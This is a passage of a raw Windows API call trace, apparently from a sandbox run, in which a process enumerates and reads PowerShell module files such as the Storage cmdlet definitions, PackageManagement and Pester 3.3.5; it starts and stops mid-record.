cFileName="Disk.cdxml", cAlternateFileName="")) returned 1 [0226.708] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1672, dwReserved0=0x0, dwReserved1=0x0, cFileName="DiskImage.cdxml", cAlternateFileName="")) returned 1 [0226.709] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd78, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileIntegrity.cdxml", cAlternateFileName="")) returned 1 [0226.709] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21df, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileServer.cdxml", cAlternateFileName="")) returned 1 [0226.709] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileShare.cdxml", cAlternateFileName="")) returned 1 [0226.710] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileStorageTier.cdxml", cAlternateFileName="")) returned 1 [0226.710] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1988, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorId.cdxml", cAlternateFileName="")) returned 1 [0226.710] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorPort.cdxml", cAlternateFileName="")) returned 1 [0226.710] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5af4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MaskingSet.cdxml", cAlternateFileName="")) returned 1 [0226.711] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OffloadDataTransferSetting.cdxml", cAlternateFileName="")) returned 1 [0226.711] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Partition.cdxml", cAlternateFileName="")) returned 1 [0226.711] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhysicalDisk.cdxml", cAlternateFileName="")) returned 1 [0226.711] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="ResiliencySetting.cdxml", cAlternateFileName="")) returned 1 [0226.711] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfb55, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.format.ps1xml", cAlternateFileName="")) returned 1 [0226.712] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1937, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.psd1", cAlternateFileName="")) returned 1 [0226.712] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b0d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.types.ps1xml", cAlternateFileName="")) returned 1 [0226.712] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2591b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageCmdlets.cdxml", cAlternateFileName="")) returned 1 [0226.712] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageEnclosure.cdxml", cAlternateFileName="")) returned 1 [0226.712] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageHealth.cdxml", cAlternateFileName="")) returned 1 [0226.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.716] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0226.716] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", lpFilePart=0x0) returned 0x3b [0226.717] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.731] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0226.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe350) returned 1 [0226.731] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0226.732] GetFileType (hFile=0x564) returned 0x1 [0226.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2c0) returned 1 [0226.732] GetFileType (hFile=0x564) returned 0x1 [0226.732] ReadFile (in: hFile=0x564, lpBuffer=0x2435a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2435a70*, lpNumberOfBytesRead=0x1b7fe428*=0x5f8, lpOverlapped=0x0) returned 1 [0226.732] ReadFile (in: hFile=0x564, lpBuffer=0x2434fa8, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2434fa8*, lpNumberOfBytesRead=0x1b7fe428*=0x0, lpOverlapped=0x0) returned 1 [0226.732] ReadFile (in: hFile=0x564, lpBuffer=0x2435a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2435a70*, lpNumberOfBytesRead=0x1b7fe428*=0x0, lpOverlapped=0x0) returned 1 [0226.732] CloseHandle (hObject=0x564) returned 1 [0226.739] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0226.739] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0226.739] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0226.739] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0226.739] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0226.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.739] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0226.739] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0226.739] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.740] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.740] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0226.740] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.740] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.740] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0226.741] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0226.741] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf850 [0226.741] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.741] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0226.741] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0226.741] FindClose (in: hFindFile=0x1a5cf850 | out: hFindFile=0x1a5cf850) returned 1 [0226.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe380) returned 1 [0226.742] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0226.742] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7fde10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0226.742] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7fe020 | out: lpFindFileData=0x1b7fe020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.742] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.742] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0226.742] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0226.743] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0226.743] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.743] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0226.743] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0226.743] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, 